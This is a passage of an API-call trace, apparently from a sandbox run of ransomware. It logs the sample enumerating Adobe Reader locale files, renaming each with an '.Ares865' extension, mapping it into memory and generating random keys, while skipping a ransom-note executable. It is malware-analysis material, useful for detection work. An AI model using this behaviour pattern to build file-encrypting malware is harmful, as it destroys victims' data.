szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2effc8) returned 1 [0060.840] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0060.840] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0060.841] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d31c0 [0060.841] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d31c0 | out: hHeap=0x2b0000) returned 1 [0060.841] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0060.841] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0060.841] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0060.841] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0060.841] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d5ee0 [0060.841] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0060.841] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d5ee0 | out: hHeap=0x2b0000) returned 1 [0060.841] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0060.841] UnmapViewOfFile (lpBaseAddress=0x1a0000) returned 1 [0060.841] CloseHandle (hObject=0x154) returned 1 [0060.841] CloseHandle (hObject=0x118) returned 1 [0060.841] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3058 | out: hHeap=0x2b0000) returned 1 [0060.841] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0060.841] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0060.842] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c36ae00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x833145e0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9c36ae00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0xa400, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EScript.CAT", cAlternateFileName="")) returned 1 [0060.842] lstrcmpiW (lpString1="EScript.CAT", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0060.842] lstrcmpiW (lpString1="EScript.CAT", lpString2="aoldtz.exe") returned 1 [0060.842] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\EScript.CAT.Ares865") returned 80 [0060.842] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\EScript.CAT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ca_es\\escript.cat"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\EScript.CAT.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ca_es\\escript.cat.ares865"), dwFlags=0x1) returned 1 [0060.842] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\EScript.CAT.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ca_es\\escript.cat.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0060.842] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=41984) returned 1 [0060.843] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0060.843] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3058 [0060.843] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0060.843] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2effc8) returned 1 [0060.844] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0060.844] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0060.844] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xa700, lpName=0x0) returned 0x154 [0060.845] MapViewOfFile (hFileMappingObject=0x154, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xa700) returned 0x1a0000 [0060.847] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2effc8) returned 1 [0060.848] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0060.848] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0060.848] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d31c0 [0060.848] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d31c0 | out: hHeap=0x2b0000) returned 1 [0060.848] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0060.848] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0060.848] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0060.848] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0060.848] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d5ee0 [0060.848] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0060.848] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d5ee0 | out: hHeap=0x2b0000) returned 1 [0060.848] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0060.848] UnmapViewOfFile (lpBaseAddress=0x1a0000) returned 1 [0060.849] CloseHandle (hObject=0x154) returned 1 [0060.849] CloseHandle (hObject=0x118) returned 1 [0060.849] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3058 | out: hHeap=0x2b0000) returned 1 [0060.849] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0060.849] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0060.850] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x551c2420, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x551c2420, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0060.850] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0060.850] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c36ae00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x833145e0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9c36ae00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IA32.CAT", cAlternateFileName="")) returned 1 [0060.850] lstrcmpiW (lpString1="IA32.CAT", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0060.850] lstrcmpiW (lpString1="IA32.CAT", lpString2="aoldtz.exe") returned 1 [0060.850] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\IA32.CAT.Ares865") returned 77 [0060.850] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\IA32.CAT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ca_es\\ia32.cat"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\IA32.CAT.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ca_es\\ia32.cat.ares865"), dwFlags=0x1) returned 1 [0060.850] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\IA32.CAT.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ca_es\\ia32.cat.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0060.851] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=3584) returned 1 [0060.851] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0060.851] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3058 [0060.851] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0060.851] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2effc8) returned 1 [0060.852] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0060.852] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0060.852] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1100, lpName=0x0) returned 0x154 [0060.853] MapViewOfFile (hFileMappingObject=0x154, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1100) returned 0x1a0000 [0060.854] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2effc8) returned 1 [0060.855] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0060.855] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0060.855] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d31c0 [0060.855] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d31c0 | out: hHeap=0x2b0000) returned 1 [0060.855] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0060.855] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0060.855] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0060.855] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0060.855] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d5ee0 [0060.855] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0060.855] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d5ee0 | out: hHeap=0x2b0000) returned 1 [0060.855] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0060.855] UnmapViewOfFile (lpBaseAddress=0x1a0000) returned 1 [0060.855] CloseHandle (hObject=0x154) returned 1 [0060.855] CloseHandle (hObject=0x118) returned 1 [0060.855] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3058 | out: hHeap=0x2b0000) returned 1 [0060.855] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0060.855] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0060.856] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c36ae00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7db99d60, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9c36ae00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x13600, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="makeaccessible.CAT", cAlternateFileName="MAKEAC~1.CAT")) returned 1 [0060.856] lstrcmpiW (lpString1="makeaccessible.CAT", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0060.856] lstrcmpiW (lpString1="makeaccessible.CAT", lpString2="aoldtz.exe") returned 1 [0060.856] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\makeaccessible.CAT.Ares865") returned 87 [0060.856] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\makeaccessible.CAT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ca_es\\makeaccessible.cat"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\makeaccessible.CAT.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ca_es\\makeaccessible.cat.ares865"), dwFlags=0x1) returned 1 [0060.856] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\makeaccessible.CAT.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ca_es\\makeaccessible.cat.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0060.857] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=79360) returned 1 [0060.857] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0060.857] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3058 [0060.857] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0060.857] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2effc8) returned 1 [0060.858] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0060.858] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0060.858] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x13900, lpName=0x0) returned 0x154 [0060.859] MapViewOfFile (hFileMappingObject=0x154, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x13900) returned 0x420000 [0060.865] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2effc8) returned 1 [0060.866] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0060.866] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0060.866] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d31c0 [0060.866] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d31c0 | out: hHeap=0x2b0000) returned 1 [0060.866] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0060.866] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0060.866] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0060.866] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0060.866] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d5ee0 [0060.866] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0060.866] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d5ee0 | out: hHeap=0x2b0000) returned 1 [0060.866] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0060.866] UnmapViewOfFile (lpBaseAddress=0x420000) returned 1 [0060.867] CloseHandle (hObject=0x154) returned 1 [0060.867] CloseHandle (hObject=0x118) returned 1 [0060.867] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3058 | out: hHeap=0x2b0000) returned 1 [0060.867] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0060.867] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0060.868] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c36ae00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7d853f20, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9c36ae00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x14200, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Multimedia.CAT", cAlternateFileName="MULTIM~1.CAT")) returned 1 [0060.868] lstrcmpiW (lpString1="Multimedia.CAT", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0060.868] lstrcmpiW (lpString1="Multimedia.CAT", lpString2="aoldtz.exe") returned 1 [0060.868] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\Multimedia.CAT.Ares865") returned 83 [0060.868] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\Multimedia.CAT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ca_es\\multimedia.cat"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\Multimedia.CAT.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ca_es\\multimedia.cat.ares865"), dwFlags=0x1) returned 1 [0060.868] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\Multimedia.CAT.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ca_es\\multimedia.cat.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0060.869] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=82432) returned 1 [0060.869] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0060.869] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3058 [0060.869] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0060.869] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2effc8) returned 1 [0060.870] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0060.870] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0060.870] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x14500, lpName=0x0) returned 0x154 [0060.871] MapViewOfFile (hFileMappingObject=0x154, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x14500) returned 0x420000 [0060.875] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2effc8) returned 1 [0060.876] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0060.876] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0060.876] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d31c0 [0060.876] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d31c0 | out: hHeap=0x2b0000) returned 1 [0060.876] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0060.876] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0060.876] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0060.876] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0060.876] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d5ee0 [0060.876] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0060.876] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d5ee0 | out: hHeap=0x2b0000) returned 1 [0060.876] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0060.877] UnmapViewOfFile (lpBaseAddress=0x420000) returned 1 [0060.877] CloseHandle (hObject=0x154) returned 1 [0060.877] CloseHandle (hObject=0x118) returned 1 [0060.877] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3058 | out: hHeap=0x2b0000) returned 1 [0060.877] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0060.877] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0060.878] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c36ae00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7db99d60, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9c36ae00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x2e00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pddom.CAT", cAlternateFileName="")) returned 1 [0060.878] lstrcmpiW (lpString1="pddom.CAT", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0060.878] lstrcmpiW (lpString1="pddom.CAT", lpString2="aoldtz.exe") returned 1 [0060.878] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\pddom.CAT.Ares865") returned 78 [0060.878] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\pddom.CAT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ca_es\\pddom.cat"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\pddom.CAT.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ca_es\\pddom.cat.ares865"), dwFlags=0x1) returned 1 [0060.879] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\pddom.CAT.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ca_es\\pddom.cat.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0060.879] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=11776) returned 1 [0060.879] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0060.880] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3058 [0060.880] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0060.880] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2effc8) returned 1 [0060.880] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0060.881] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0060.881] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x3100, lpName=0x0) returned 0x154 [0060.882] MapViewOfFile (hFileMappingObject=0x154, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3100) returned 0x1a0000 [0060.883] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2effc8) returned 1 [0060.884] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0060.884] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0060.884] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d31c0 [0060.884] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d31c0 | out: hHeap=0x2b0000) returned 1 